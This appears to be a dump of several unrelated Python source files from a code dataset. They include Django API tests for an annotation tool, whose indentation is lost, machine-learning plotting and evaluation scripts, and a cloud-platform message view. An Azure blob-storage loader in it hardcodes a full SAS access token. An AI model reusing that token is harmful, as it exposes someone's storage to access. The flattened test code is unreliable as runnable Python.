expected_keys = {key for label in expected_labels for key in label}
response = self.client.get(url).json()
actual_labels = [{key: value for (key, value) in label.items() if key in expected_keys}
for label in response]
self.assertCountEqual(actual_labels, expected_labels)
for label in response:
for expected_label_key in expected_label_keys:
self.assertIsNotNone(label.get(expected_label_key))
def test_can_upload_conll_format_file(self):
self.upload_test_helper(project_id=self.labeling_project.id,
filename='labeling.conll',
file_format='conll',
expected_status=status.HTTP_201_CREATED)
def test_cannot_upload_wrong_conll_format_file(self):
self.upload_test_helper(project_id=self.labeling_project.id,
filename='labeling.invalid.conll',
file_format='conll',
expected_status=status.HTTP_400_BAD_REQUEST)
def test_can_upload_classification_csv(self):
self.upload_test_helper(project_id=self.classification_project.id,
filename='example.csv',
file_format='csv',
expected_status=status.HTTP_201_CREATED)
def test_can_upload_classification_csv_with_out_of_order_columns(self):
self.upload_test_helper(project_id=self.classification_project.id,
filename='example_out_of_order_columns.csv',
file_format='csv',
expected_status=status.HTTP_201_CREATED)
self.label_test_helper(
project_id=self.classification_project.id,
expected_labels=[
{'text': 'Positive'},
{'text': 'Negative'},
],
expected_label_keys=[],
)
def test_can_upload_csv_with_non_utf8_encoding(self):
self.upload_test_helper(project_id=self.classification_project.id,
filename='example.utf16.csv',
file_format='csv',
expected_status=status.HTTP_201_CREATED)
def test_can_upload_seq2seq_csv(self):
self.upload_test_helper(project_id=self.seq2seq_project.id,
filename='example.csv',
file_format='csv',
expected_status=status.HTTP_201_CREATED)
def test_can_upload_single_column_csv(self):
self.upload_test_helper(project_id=self.seq2seq_project.id,
filename='example_one_column.csv',
file_format='csv',
expected_status=status.HTTP_201_CREATED)
def test_can_upload_csv_file_does_not_match_column_and_row(self):
self.upload_test_helper(project_id=self.classification_project.id,
filename='example_column_and_row_not_matching.csv',
file_format='csv',
expected_status=status.HTTP_201_CREATED)
def test_cannot_upload_csv_file_has_too_many_columns(self):
self.upload_test_helper(project_id=self.classification_project.id,
filename='example.invalid.2.csv',
file_format='csv',
expected_status=status.HTTP_400_BAD_REQUEST)
def test_can_upload_classification_excel(self):
self.upload_test_helper(project_id=self.classification_project.id,
filename='example.xlsx',
file_format='excel',
expected_status=status.HTTP_201_CREATED)
def test_can_upload_seq2seq_excel(self):
self.upload_test_helper(project_id=self.seq2seq_project.id,
filename='example.xlsx',
file_format='excel',
expected_status=status.HTTP_201_CREATED)
def test_can_upload_single_column_excel(self):
self.upload_test_helper(project_id=self.seq2seq_project.id,
filename='example_one_column.xlsx',
file_format='excel',
expected_status=status.HTTP_201_CREATED)
def test_can_upload_excel_file_does_not_match_column_and_row(self):
self.upload_test_helper(project_id=self.classification_project.id,
filename='example_column_and_row_not_matching.xlsx',
file_format='excel',
expected_status=status.HTTP_201_CREATED)
def test_cannot_upload_excel_file_has_too_many_columns(self):
self.upload_test_helper(project_id=self.classification_project.id,
filename='example.invalid.2.xlsx',
file_format='excel',
expected_status=status.HTTP_400_BAD_REQUEST)
@override_settings(IMPORT_BATCH_SIZE=1)
def test_can_upload_small_batch_size(self):
self.upload_test_helper(project_id=self.seq2seq_project.id,
filename='example_one_column_no_header.xlsx',
file_format='excel',
expected_status=status.HTTP_201_CREATED)
def test_can_upload_classification_jsonl(self):
self.upload_test_helper(project_id=self.classification_project.id,
filename='classification.jsonl',
file_format='json',
expected_status=status.HTTP_201_CREATED)
self.label_test_helper(
project_id=self.classification_project.id,
expected_labels=[
{'text': 'positive', 'suffix_key': 'p', 'prefix_key': None},
{'text': 'negative', 'suffix_key': 'n', 'prefix_key': None},
{'text': 'neutral', 'suffix_key': 'n', 'prefix_key': 'ctrl'},
],
expected_label_keys=[
'background_color',
'text_color',
])
def test_can_upload_labeling_jsonl(self):
self.upload_test_helper(project_id=self.labeling_project.id,
filename='labeling.jsonl',
file_format='json',
expected_status=status.HTTP_201_CREATED)
self.label_test_helper(
project_id=self.labeling_project.id,
expected_labels=[
{'text': 'LOC', 'suffix_key': 'l', 'prefix_key': None},
{'text': 'ORG', 'suffix_key': 'o', 'prefix_key': None},
{'text': 'PER', 'suffix_key': 'p', 'prefix_key': None},
],
expected_label_keys=[
'background_color',
'text_color',
])
def test_can_upload_seq2seq_jsonl(self):
self.upload_test_helper(project_id=self.seq2seq_project.id,
filename='seq2seq.jsonl',
file_format='json',
expected_status=status.HTTP_201_CREATED)
def test_can_upload_plain_text(self):
self.upload_test_helper(project_id=self.classification_project.id,
filename='example.txt',
file_format='plain',
expected_status=status.HTTP_201_CREATED)
def test_can_upload_data_without_label(self):
self.upload_test_helper(project_id=self.classification_project.id,
filename='example.jsonl',
file_format='json',
expected_status=status.HTTP_201_CREATED)
@classmethod
def doCleanups(cls):
remove_all_role_mappings()
@override_settings(CLOUD_BROWSER_APACHE_LIBCLOUD_PROVIDER='LOCAL')
@override_settings(CLOUD_BROWSER_APACHE_LIBCLOUD_ACCOUNT=os.path.dirname(DATA_DIR))
@override_settings(CLOUD_BROWSER_APACHE_LIBCLOUD_SECRET_KEY='not-used')
class TestCloudUploader(TestUploader):
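# Runs every test inherited from TestUploader, but routes the import through the cloud_uploader
# endpoint backed by a local libcloud container (see the override_settings decorators above).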
def upload_test_helper(self, project_id, filename, file_format, expected_status, **kwargs):
query_params = {
'project_id': project_id,
'upload_format': file_format,
'container': kwargs.pop('container', os.path.basename(DATA_DIR)),
'object': filename,
}
query_params.update(kwargs)
response = self.client.get(reverse('cloud_uploader'), query_params)
self.assertEqual(response.status_code, expected_status)
def test_cannot_upload_with_missing_file(self):
self.upload_test_helper(project_id=self.classification_project.id,
filename='does-not-exist',
file_format='json',
expected_status=status.HTTP_400_BAD_REQUEST)
def test_cannot_upload_with_missing_container(self):
self.upload_test_helper(project_id=self.classification_project.id,
filename='example.jsonl',
container='does-not-exist',
file_format='json',
expected_status=status.HTTP_400_BAD_REQUEST)
def test_cannot_upload_with_missing_query_parameters(self):
response = self.client.get(reverse('cloud_uploader'), {'project_id': self.classification_project.id})
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_can_upload_with_redirect(self):
self.upload_test_helper(project_id=self.classification_project.id,
filename='example.jsonl',
next='http://somewhere',
file_format='json',
expected_status=status.HTTP_302_FOUND)
def test_can_upload_with_redirect_to_blank(self):
self.upload_test_helper(project_id=self.classification_project.id,
filename='example.jsonl',
next='about:blank',
file_format='json',
expected_status=status.HTTP_201_CREATED)
class TestFeatures(APITestCase):
@classmethod
def setUpTestData(cls):
cls.user_name = 'user_name'
cls.user_pass = '<PASSWORD>'
create_default_roles()
cls.user = User.objects.create_user(username=cls.user_name, password=cls.user_pass, email='<EMAIL>')
def setUp(self):
self.client.login(username=self.user_name, password=self.user_pass)
@override_settings(CLOUD_BROWSER_APACHE_LIBCLOUD_PROVIDER=None)
def test_no_cloud_upload(self):
response = self.client.get(reverse('features'))
self.assertFalse(response.json().get('cloud_upload'))
@override_settings(IMPORT_BATCH_SIZE=2)
class TestParser(APITestCase):
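# parser_helper runs the given parser over a fixture file and asserts every parsed record has a
# 'text' key (plus 'labels' when include_label is True); the parsed batches are returned to the caller.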
def parser_helper(self, filename, parser, include_label=True):
with open(os.path.join(DATA_DIR, filename), mode='rb') as f:
result = list(parser.parse(f))
for data in result:
for r in data:
self.assertIn('text', r)
if include_label:
self.assertIn('labels', r)
return result
def test_give_valid_data_to_conll_parser(self):
self.parser_helper(filename='labeling.conll', parser=CoNLLParser())
def test_give_valid_data_to_conll_parser_with_trailing_newlines(self):
result = self.parser_helper(filename='labeling.trailing.conll', parser=CoNLLParser())
self.assertEqual(len(result), 1)
self.assertEqual(len(result[0]), 1)
def test_plain_parser(self):
self.parser_helper(filename='example.txt', parser=PlainTextParser(), include_label=False)
def test_give_invalid_data_to_conll_parser(self):
with self.assertRaises(FileParseException):
self.parser_helper(filename='labeling.invalid.conll',
parser=CoNLLParser())
def test_give_classification_data_to_csv_parser(self):
self.parser_helper(filename='example.csv', parser=CSVParser(), include_label=False)
def test_give_seq2seq_data_to_csv_parser(self):
self.parser_helper(filename='example.csv', parser=CSVParser(), include_label=False)
def test_give_classification_data_to_json_parser(self):
self.parser_helper(filename='classification.jsonl', parser=JSONParser())
def test_give_labeling_data_to_json_parser(self):
self.parser_helper(filename='labeling.jsonl', parser=JSONParser())
def test_give_seq2seq_data_to_json_parser(self):
self.parser_helper(filename='seq2seq.jsonl', parser=JSONParser())
def test_give_data_without_label_to_json_parser(self):
self.parser_helper(filename='example.jsonl', parser=JSONParser(), include_label=False)
def test_give_labeling_data_to_fasttext_parser(self):
self.parser_helper(filename='example_fasttext.txt', parser=FastTextParser())
def test_give_data_without_label_name_to_fasttext_parser(self):
with self.assertRaises(FileParseException):
self.parser_helper(filename='example_fasttext_label_tag_without_name.txt', parser=FastTextParser())
def test_give_data_without_text_to_fasttext_parser(self):
with self.assertRaises(FileParseException):
self.parser_helper(filename='example_fasttext_without_text.txt', parser=FastTextParser())
class TestDownloader(APITestCase):
@classmethod
def setUpTestData(cls):
cls.super_user_name = 'super_user_name'
cls.super_user_pass = '<PASSWORD>'
# Todo: change super_user to project_admin.
create_default_roles()
super_user = User.objects.create_superuser(username=cls.super_user_name,
password=<PASSWORD>,
email='<EMAIL>')
cls.classification_project = mommy.make('TextClassificationProject',
users=[super_user], project_type=DOCUMENT_CLASSIFICATION)
cls.labeling_project = mommy.make('SequenceLabelingProject',
users=[super_user], project_type=SEQUENCE_LABELING)
cls.seq2seq_project = mommy.make('Seq2seqProject', users=[super_user], project_type=SEQ2SEQ)
cls.speech2text_project = mommy.make('Speech2textProject', users=[super_user], project_type=SPEECH2TEXT)
cls.classification_url = reverse(viewname='doc_downloader', args=[cls.classification_project.id])
cls.labeling_url = reverse(viewname='doc_downloader', args=[cls.labeling_project.id])
cls.seq2seq_url = reverse(viewname='doc_downloader', args=[cls.seq2seq_project.id])
cls.speech2text_url = reverse(viewname='doc_downloader', args=[cls.speech2text_project.id])
def setUp(self):
self.client.login(username=self.super_user_name,
password=<PASSWORD>)
def download_test_helper(self, url, format, expected_status):
response = self.client.get(url, data={'q': format})
self.assertEqual(response.status_code, expected_status)
def test_cannot_download_conll_format_file(self):
self.download_test_helper(url=self.labeling_url,
format='conll',
expected_status=status.HTTP_400_BAD_REQUEST)
def test_can_download_classification_csv(self):
self.download_test_helper(url=self.classification_url,
format='csv',
expected_status=status.HTTP_200_OK)
def test_can_download_labeling_csv(self):
self.download_test_helper(url=self.labeling_url,
format='csv',
expected_status=status.HTTP_200_OK)
def test_can_download_seq2seq_csv(self):
self.download_test_helper(url=self.seq2seq_url,
format='csv',
expected_status=status.HTTP_200_OK)
def test_can_download_classification_jsonl(self):
self.download_test_helper(url=self.classification_url,
format='json',
expected_status=status.HTTP_200_OK)
def test_can_download_labeling_jsonl(self):
self.download_test_helper(url=self.labeling_url,
format='json',
expected_status=status.HTTP_200_OK)
def test_can_download_seq2seq_jsonl(self):
self.download_test_helper(url=self.seq2seq_url,
format='json',
expected_status=status.HTTP_200_OK)
def test_can_download_speech2text_jsonl(self):
self.download_test_helper(url=self.speech2text_url,
format='json',
expected_status=status.HTTP_200_OK)
def test_can_download_labelling_jsonl(self):
self.download_test_helper(url=self.labeling_url,
format='jsonl',
expected_status=status.HTTP_200_OK)
def test_can_download_plain_text(self):
self.download_test_helper(url=self.classification_url,
format='plain',
expected_status=status.HTTP_400_BAD_REQUEST)
class TestStatisticsAPI(APITestCase, TestUtilsMixin):
@classmethod
def setUpTestData(cls):
cls.super_user_name = 'super_user_name'
cls.super_user_pass = '<PASSWORD>'
cls.other_user_name = 'other_user_name'
cls.other_user_pass = '<PASSWORD>'
create_default_roles()
# Todo: change super_user to project_admin.
super_user = User.objects.create_superuser(username=cls.super_user_name,
password=<PASSWORD>,
email='<EMAIL>')
other_user = User.objects.create_user(username=cls.other_user_name,
password=<PASSWORD>.<PASSWORD>,
email='<EMAIL>')
cls.project = mommy.make('TextClassificationProject', users=[super_user, other_user])
doc1 = mommy.make('Document', project=cls.project)
doc2 = mommy.make('Document', project=cls.project)
mommy.make('DocumentAnnotation', document=doc1, user=super_user)
mommy.make('DocumentAnnotation', document=doc2, user=other_user)
cls.url = reverse(viewname='statistics', args=[cls.project.id])
cls.doc = Document.objects.filter(project=cls.project)
assign_user_to_role(project_member=other_user, project=cls.project,
role_name=settings.ROLE_ANNOTATOR)
@classmethod
def doCleanups(cls):
remove_all_role_mappings()
def test_returns_exact_progress(self):
self.client.login(username=self.super_user_name,
password=self.<PASSWORD>)
response = self.client.get(self.url, format='json')
self.assertEqual(response.data['total'], 2)
self.assertEqual(response.data['remaining'], 1)
def test_returns_exact_progress_with_collaborative_annotation(self):
self._patch_project(self.project, 'collaborative_annotation', True)
self.client.login(username=self.other_user_name,
password=self.other_<PASSWORD>)
response = self.client.get(self.url, format='json')
self.assertEqual(response.data['total'], 2)
self.assertEqual(response.data['remaining'], 0)
def test_returns_user_count(self):
self.client.login(username=self.super_user_name,
password=self.super_user_<PASSWORD>)
response = self.client.get(self.url, format='json')
self.assertIn('label', response.data)
self.assertIsInstance(response.data['label'], dict)
def test_returns_label_count(self):
self.client.login(username=self.super_user_name,
password=self.super_user_pass)
response = self.client.get(self.url, format='json')
self.assertIn('user', response.data)
self.assertIsInstance(response.data['user'], dict)
def test_returns_partial_response(self):
self.client.login(username=self.super_user_name,
password=self.super_user_<PASSWORD>)
response = self.client.get(f'{self.url}?include=user', format='json')
self.assertEqual(list(response.data.keys()), ['user'])
class TestUserAPI(APITestCase):
@classmethod
def setUpTestData(cls):
cls.super_user_name = 'super_user_name'
cls.super_user_pass = '<PASSWORD>'
create_default_roles()
User.objects.create_superuser(username=cls.super_user_name,
password=<PASSWORD>,
email='<EMAIL>')
cls.url = reverse(viewname='user_list')
def test_returns_user_count(self):
self.client.login(username=self.super_user_name,
password=self.<PASSWORD>)
response = self.client.get(self.url, format='json')
self.assertEqual(1, len(response.data))
class TestRoleAPI(APITestCase):
@classmethod
def setUpTestData(cls):
cls.user_name = 'user_name'
cls.user_pass = '<PASSWORD>'
cls.project_admin_name = 'project_admin_name'
cls.project_admin_pass = '<PASSWORD>'
create_default_roles()
cls.user = User.objects.create_user(username=cls.user_name,
password=cls.user_pass)
User.objects.create_superuser(username=cls.project_admin_name,
password=<PASSWORD>,
email='<EMAIL>')
cls.url = reverse(viewname='roles')
def test_cannot_create_multiple_roles_with_same_name(self):
self.client.login(username=self.project_admin_name,
password=self.project_admin_pass)
roles = [
{'name': 'examplerole', 'description': 'example'},
{'name': 'examplerole', 'description': 'example'}
]
self.client.post(self.url, format='json', data=roles[0])
second_response = self.client.post(self.url, format='json', data=roles[1])
self.assertEqual(second_response.status_code, status.HTTP_400_BAD_REQUEST)
def test_nonadmin_cannot_create_role(self):
self.client.login(username=self.user_name,
password=self.user_pass)
data = {'name': 'testrole', 'description': 'example'}
response = self.client.post(self.url, format='json', data=data)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_admin_can_create_role(self):
self.client.login(username=self.project_admin_name,
password=self.project_admin_pass)
data = {'name': 'testrole', 'description': 'example'}
response = self.client.post(self.url, format='json', data=data)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
def test_admin_can_get_roles(self):
self.client.login(username=self.project_admin_name,
password=self.project_admin_pass)
response = self.client.get(self.url, format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
class TestRoleMappingListAPI(APITestCase):
@classmethod
def setUpTestData(cls):
cls.project_member_name = 'project_member_name'
cls.project_member_pass = '<PASSWORD>'
cls.second_project_member_name = 'second_project_member_name'
cls.second_project_member_pass = '<PASSWORD>'
cls.project_admin_name = 'project_admin_name'
cls.project_admin_pass = '<PASSWORD>'
create_default_roles()
project_member = User.objects.create_user(username=cls.project_member_name,
password=cls.project_member_<PASSWORD>)
cls.second_project_member = User.objects.create_user(username=cls.second_project_member_name,
password=cls.second_project_member_pass)
project_admin = User.objects.create_user(username=cls.project_admin_name,
password=<PASSWORD>)
cls.main_project = mommy.make('Project', users=[project_member, project_admin, cls.second_project_member])
cls.other_project = mommy.make('Project', users=[cls.second_project_member, project_admin])
cls.admin_role = Role.objects.get(name=settings.ROLE_PROJECT_ADMIN)
cls.role = mommy.make('Role', name='otherrole')
mommy.make('RoleMapping', role=cls.admin_role, project=cls.main_project, user=project_admin)
cls.data = {'user': project_member.id, 'role': cls.admin_role.id, 'project': cls.main_project.id}
cls.other_url = reverse(viewname='rolemapping_list', args=[cls.other_project.id])
cls.url = reverse(viewname='rolemapping_list', args=[cls.main_project.id])
def test_returns_mappings_to_project_admin(self):
self.client.login(username=self.project_admin_name,
password=self.project_<PASSWORD>)
response = self.client.get(self.url, format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_allows_superuser_to_create_mapping(self):
self.client.login(username=self.project_admin_name,
password=self.project_<PASSWORD>_<PASSWORD>)
response = self.client.post(self.url, format='json', data=self.data)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
def test_do_not_allow_nonadmin_to_create_mapping(self):
self.client.login(username=self.project_member_name,
password=self.project_member_pass)
response = self.client.post(self.url, format='json', data=self.data)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_do_not_return_mappings_to_nonadmin(self):
self.client.login(username=self.project_member_name,
password=self.project_member_pass)
response = self.client.get(self.url, format='json')
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
class TestRoleMappingDetailAPI(APITestCase):
@classmethod
def setUpTestData(cls):
cls.project_admin_name = 'project_admin_name'
cls.project_admin_pass = '<PASSWORD>'
cls.project_member_name = 'project_member_name'
cls.project_member_pass = '<PASSWORD>'
cls.non_project_member_name = 'non_project_member_name'
cls.non_project_member_pass = '<PASSWORD>'
create_default_roles()
project_admin = User.objects.create_user(username=cls.project_admin_name,
password=<PASSWORD>)
project_member = User.objects.create_user(username=cls.project_member_name,
password=<PASSWORD>)
User.objects.create_user(username=cls.non_project_member_name, password=cls.non_project_member_pass)
project = mommy.make('Project', users=[project_admin, project_member])
admin_role = Role.objects.get(name=settings.ROLE_PROJECT_ADMIN)
annotator_role = Role.objects.get(name=settings.ROLE_ANNOTATOR)
cls.rolemapping = mommy.make('RoleMapping', role=admin_role, project=project, user=project_admin)
cls.url = reverse(viewname='rolemapping_detail', args=[project.id, cls.rolemapping.id])
cls.data = {'role': annotator_role.id }
def test_returns_rolemapping_to_project_member(self):
self.client.login(username=self.project_admin_name,
password=self.project_admin_pass)
response = self.client.get(self.url, format='json')
self.assertEqual(response.data['id'], self.rolemapping.id)
def test_do_not_return_mapping_to_non_project_member(self):
self.client.login(username=self.non_project_member_name,
password=self.non_project_member_pass)
response = self.client.get(self.url, format='json')
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_allows_admin_to_update_mapping(self):
self.client.login(username=self.project_admin_name,
password=self.project_<PASSWORD>)
response = self.client.patch(self.url, format='json', data=self.data)
self.assertEqual(response.data['role'], self.data['role'])
def test_disallows_project_member_to_update_mapping(self):
self.client.login(username=self.project_member_name,
password=self.project_member_<PASSWORD>)
response = self.client.patch(self.url, format='json', data=self.data)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_allows_admin_to_delete_mapping(self):
self.client.login(username=self.project_admin_name,
password=self.project_<PASSWORD>_<PASSWORD>)
response = self.client.delete(self.url, format='json')
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
def test_disallows_project_member_to_delete_mapping(self):
self.client.login(username=self.project_member_name,
password=self.project_member_<PASSWORD>)
response = self.client.delete(self.url, format='json')
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
| StarcoderdataPython |
90799 | <reponame>peekxc/tallem
# %% Imports
from tallem import TALLEM
from tallem.dimred import *
from tallem.cover import *
from tallem.distance import dist
from tallem.samplers import landmarks
from tallem.datasets import *
import matplotlib.pyplot as plt
# %% Load frey faces
import pickle
ff = pickle.load(open('/Users/mpiekenbrock/tallem/data/frey_faces.pickle', "rb")).T # 20 x 28
# %% Run TALLEM on frey faces
from tallem.dimred import rnn_graph, knn_graph, geodesic_dist
#G = rnn_graph(ff)
G = knn_graph(ff, k=20)
D = geodesic_dist(np.ascontiguousarray(G.A, dtype=np.float64))
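# Note: the two lines above build a k-nearest-neighbour graph on the face images and replace
# Euclidean distances with shortest-path (geodesic) distances, an Isomap-style metric that the
# landmark cover below is computed on.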
cover = LandmarkCover(D, n_sets=25, scale=1.15)
# [len(subset) for subset in cover.values()]
top = TALLEM(cover, local_map="pca2", D=2)
emb = top.fit_transform(X=ff)
# %% Plot the points + the faces as images using matplotlib
fig = plt.figure(figsize=(8, 8), dpi=300)
ax = plt.gca()
ax.axis('off')
plt.scatter(*emb.T, alpha=0.70, s=8, edgecolor='gray',linewidth=0.30)
Lind, Lrad = landmarks(emb, k = 120)
img_width = 0.02*np.max(dist(emb)) # size of plotted images
for i in Lind:
bbox = np.array([emb[i,0] + img_width*np.array([-1.0, 1.0]), emb[i,1] + img_width*np.array([-1.0, 1.0])]).flatten()
face_im = ax.imshow(ff[i,:].reshape((28,20)), origin='upper', extent=bbox, cmap='gray', vmin=0, vmax=255)
face_im.set_zorder(20)
ax.set_xlim(left=np.min(emb[:,0])-img_width, right=np.max(emb[:,0])+img_width)
ax.set_ylim(bottom=np.min(emb[:,1])-img_width, top=np.max(emb[:,1])+img_width)
# plt.savefig("frey_faces.png", dpi=300, format="png", pad_inches=0.0, transparent=True)
plt.show()
# %% (Optional) Plot the points + the faces as images using matplotlib + datashader
import datashader as ds
from datashader.mpl_ext import dsshow, alpha_colormap
from pandas import DataFrame # bleh why is this necessary datashader
import datashader.transfer_functions as tf
from functools import partial
fig = plt.figure(figsize=(3.25, 3.25), dpi=300)
ax = plt.gca()
ax.axis('off')
df = DataFrame(emb, columns = ['x','y'])
shade_hook=partial(tf.dynspread, threshold=0.001, how='add', max_px=100)
dsshow(df, ds.Point('x', 'y'), norm='eq_hist', aspect='equal', ax=ax)
for i in Lind:
bbox = np.array([emb[i,0] + img_width*np.array([-1.0, 1.0]), emb[i,1] + img_width*np.array([-1.0, 1.0])]).flatten()
face_im = ax.imshow(ff[i,:].reshape((28,20)), origin='upper', extent=bbox, cmap='gray', vmin=0, vmax=255)
face_im.set_zorder(20)
ax.set_xlim(left=np.min(emb[:,0])-img_width, right=np.max(emb[:,0])+img_width)
ax.set_ylim(bottom=np.min(emb[:,1])-img_width, top=np.max(emb[:,1])+img_width)
plt.savefig("frey_faces.png", dpi=300, format="png", pad_inches=0.0, transparent=True)
plt.show()
# da = DSArtist(ax_r[0], df, 'x', 'y', ds.mean('z'), norm = mcolors.LogNorm())
# %% MNIST eights
import pickle
mn = pickle.load(open('/Users/mpiekenbrock/tallem/data/mnist_eights.pickle', "rb")).T # 28 x 28
rotate = lambda x: np.fliplr(x.T)
mn = np.array([rotate(mn[:,:,i]).flatten() for i in range(mn.shape[2])])
# %% Parameterize TALLEM
G = rnn_graph(mn, p=0.001)
# G = knn_graph(mn, k=20)
D = geodesic_dist(rnn_graph(mn, p=0.001).A)
cover = LandmarkCover(D, n_sets=80, scale=1.15) # 80, scale=1.10
[len(subset) for subset in cover.values()]
top = TALLEM(cover, local_map="pca2", D=2)
emb = top.fit_transform(X=mn)
# LI, LR = landmarks(mn, 80)
# %% Make scatter plot + images
fig = plt.figure(figsize=(5, 5), dpi=300)
ax = plt.gca()
ax.axis('off')
plt.scatter(*emb.T, alpha=0.70, s=8, edgecolor='gray',linewidth=0.30)
Lind, Lrad = landmarks(emb, k = 120)
img_width = 0.02*np.max(dist(emb))
for i in Lind:
bbox = np.array([emb[i,0] + img_width*np.array([-1.0, 1.0]), emb[i,1] + img_width*np.array([-1.0, 1.0])]).flatten()
face_im = ax.imshow(mn[i,:].reshape((28,28)), origin='upper', extent=bbox, cmap='gray', vmin=0, vmax=255)
face_im.set_zorder(20)
ax.set_xlim(left=np.min(emb[:,0]), right=np.max(emb[:,0]))
ax.set_ylim(bottom=np.min(emb[:,1]), top=np.max(emb[:,1]))
# plt.savefig("mnist_eights.png", dpi=300, format="png", pad_inches=0.0, transparent=True)
plt.show()
# %% (optional) MNIST datashader figure
import datashader as ds
from datashader.mpl_ext import dsshow, alpha_colormap
from pandas import DataFrame # bleh why is this necessary datashader
import datashader.transfer_functions as tf
from functools import partial
fig = plt.figure(figsize=(3.25, 3.25), dpi=300)
ax = plt.gca()
ax.axis('off')
df = DataFrame(emb, columns = ['x','y'])
shade_hook=partial(tf.dynspread, threshold=0.999, how='add', max_px=100)
dsshow(df, ds.Point('x', 'y'), norm='linear', aspect='equal', vmax=10, ax=ax, vmin=1, cmap="viridis")
for i in Lind:
bbox = np.array([emb[i,0] + img_width*np.array([-1.0, 1.0]), emb[i,1] + img_width*np.array([-1.0, 1.0])]).flatten()
face_im = ax.imshow(mn[i,:].reshape((28,28)), origin='upper', extent=bbox, cmap='gray', vmin=0, vmax=255)
face_im.set_zorder(20)
ax.set_xlim(left=np.min(emb[:,0])-img_width, right=np.max(emb[:,0])+img_width)
ax.set_ylim(bottom=np.min(emb[:,1])-img_width, top=np.max(emb[:,1])+img_width)
plt.savefig("mnist_eights.png", dpi=300, format="png", pad_inches=0.0, transparent=True)
plt.show() | StarcoderdataPython |
1743485 | <filename>django_loki/__init__.py
"""
MIT License
Copyright (c) 2021 <NAME>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
"""
from .handlers import LokiHttpHandler
from .formatters import LokiFormatter
__all__ = ['LokiHttpHandler', 'LokiFormatter']
__version__ = "0.1.0"
name = "django_loki"
| StarcoderdataPython |
1629263 | """
Requires `pip install azure-storage-blob`.
Work-in-progress example loader for Azure Blob Storage.
"""
from azure.storage.blob import BlobServiceClient, generate_account_sas, ResourceTypes, AccountSasPermissions, ContainerClient, BlobClient
import pandas as pd
from collections import defaultdict
if __name__ == "__main__":
# blob_service_client = BlobServiceClient(account_url="https://datavillagesa.blob.core.windows.net")
url_postfix = 'sv=2018-03-28&sr=c&sig=ySdG6%2BRmccOC1Eg4H0UlVDyVQgAQ1QzQdxCh1dxcTXs%3D&se=2021-05-16T16%3A56%3A39Z&sp=rl'
url = 'https://datavillagesa.blob.core.windows.net/northernlights?'
nl_container = ContainerClient.from_container_url(container_url=url+url_postfix)
blob_list = nl_container.list_blobs()
output = defaultdict(list)
for blob in blob_list:
output['SourceName'].append(blob.name)
blob_client = BlobClient.from_blob_url(blob_url=f"https://datavillagesa.blob.core.windows.net/northernlights/{blob.name}?{url_postfix}")
with open("BlockDestination.txt", "wb") as my_blob:
blob_data = blob_client.download_blob()
blob_data.readinto(my_blob)
print('here')
pd.DataFrame(output).to_csv('name_list.csv')
print('here')
| StarcoderdataPython |
55779 | <filename>Model using Optical flow/evaluate.py
import numpy as np
import torch
from climatehack import BaseEvaluator
from optical_flow_model import get_flow_images
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
print("Running on: {}".format(str(device).upper())) #For Debugging
class Evaluator(BaseEvaluator):
def setup(self):
"""Sets up anything required for evaluation.
In this case, it loads the trained model (in evaluation mode)."""
if not torch.cuda.is_available():
print("Warning: If you are running this on a CPU it could take a very long time.")
def predict(self, coordinates: np.ndarray, data: np.ndarray) -> np.ndarray:
"""Makes a prediction for the next two hours of satellite imagery.
Args:
coordinates (np.ndarray): the OSGB x and y coordinates (2, 128, 128)
data (np.ndarray): an array of 12 128*128 satellite images (12, 128, 128)
Returns:
np.ndarray: an array of 24 64*64 satellite image predictions (24, 64, 64)
"""
assert coordinates.shape == (2, 128, 128)
assert data.shape == (12, 128, 128)
data /= 1023.0
prediction = get_flow_images(data)
prediction *= 1023
prediction = prediction.cpu().detach().numpy()
prediction = prediction.astype(np.float32)
assert prediction.shape == (24, 64, 64)
return prediction
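# Illustrative call (shapes are taken from the asserts above; the random inputs are
# placeholders, not data from the competition harness):
#   ev = Evaluator()
#   coords = np.zeros((2, 128, 128), dtype=np.float32)
#   frames = (np.random.rand(12, 128, 128) * 1023).astype(np.float32)
#   out = ev.predict(coords, frames)   # -> np.ndarray of shape (24, 64, 64)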
def main():
evaluator = Evaluator()
evaluator.evaluate()
if __name__ == "__main__":
main() | StarcoderdataPython |
39345 | <reponame>cc1-cloud/cc1
# -*- coding: utf-8 -*-
# @COPYRIGHT_begin
#
# Copyright [2010-2014] Institute of Nuclear Physics PAN, Krakow, Poland
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# @COPYRIGHT_end
"""@package src.clm.views.user.message
@alldecoratedby{src.clm.utils.decorators.user_log}
"""
from clm.models.message import Message
from clm.utils.decorators import user_log
from clm.utils.exception import CLMException
@user_log(log=True)
def delete(cm_id, caller_id, message_id):
"""
Deletes specified Message.
@clmview_user
@param_post{message_id,int} id of the message to delete
"""
m = Message.get(message_id)
try:
m.delete()
except:
raise CLMException('message_delete')
@user_log(log=False)
def get_list(cm_id, caller_id):
"""
Returns list of caller's messages.
@clmview_user
@response{list(dict)} dicts describing caller's messages
"""
return [m.dict for m in Message.objects.filter(user_id=caller_id)]
| StarcoderdataPython |
11540 | from __future__ import division
import itertools
import json
import math
import os
import random
import shutil
import subprocess
import sys
durationA = str(5)
durationB = str(4)
durationC = str(1)
def main():
if len(sys.argv) > 1:
nbDepth = int(sys.argv[1])
